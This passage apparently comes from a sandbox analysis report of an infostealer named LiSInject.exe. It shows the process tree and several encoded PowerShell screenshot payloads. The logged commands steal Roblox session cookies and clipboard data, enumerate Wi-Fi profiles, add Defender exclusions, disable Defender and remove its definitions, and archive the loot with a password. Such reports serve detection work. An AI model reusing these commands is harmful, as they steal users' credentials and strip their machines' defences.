JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:3164
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3440
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fkc3zk0a\fkc3zk0a.cmdline"
        6⤵
        
        PID:4868
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF75B.tmp" "c:\Users\Admin\AppData\Local\Temp\fkc3zk0a\CSCA23C491BFD74986A3752E19AF2F6BE5.TMP"
        7⤵
        
        PID:460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1672
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1984
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4268
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4164
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2228
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:2608
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4448
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:3864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:4812
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41402\rar.exe a -r -hp"teamgc" "C:\Users\Admin\AppData\Local\Temp\1yl6V.zip" *"
      4⤵
      PID:2760
    - - C:\Users\Admin\AppData\Local\Temp\_MEI41402\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI41402\rar.exe a -r -hp"teamgc" "C:\Users\Admin\AppData\Local\Temp\1yl6V.zip" *
        5⤵
        Executes dropped EXE
        
        PID:3376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:2852
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:2156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:4548
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:1932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:4220
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:1740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:1012
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:4848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:876
- C:\Users\Admin\AppData\Local\Temp\7zOC6B812C8\LiSInject.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC6B812C8\LiSInject.exe"
  2⤵
  - Executes dropped EXE
  PID:4284
- - C:\Users\Admin\AppData\Local\Temp\7zOC6B812C8\LiSInject.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC6B812C8\LiSInject.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3420

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:812

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2352

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4068

C:\Users\Admin\Desktop\LiSInject\LiSInject.exe
"C:\Users\Admin\Desktop\LiSInject\LiSInject.exe"
1⤵
- Executes dropped EXE
PID:1456
- C:\Users\Admin\Desktop\LiSInject\LiSInject.exe
  "C:\Users\Admin\Desktop\LiSInject\LiSInject.exe"
  2⤵
  - Executes dropped EXE
  PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\LiSInject\LiSInject.exe'"
    3⤵
    PID:3840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\LiSInject\LiSInject.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:3644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1480
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:4968
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:1792
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‌ .scr'"
    3⤵
    PID:1588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5104
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1748
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4560
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4528
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3980
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2336
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3848
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwA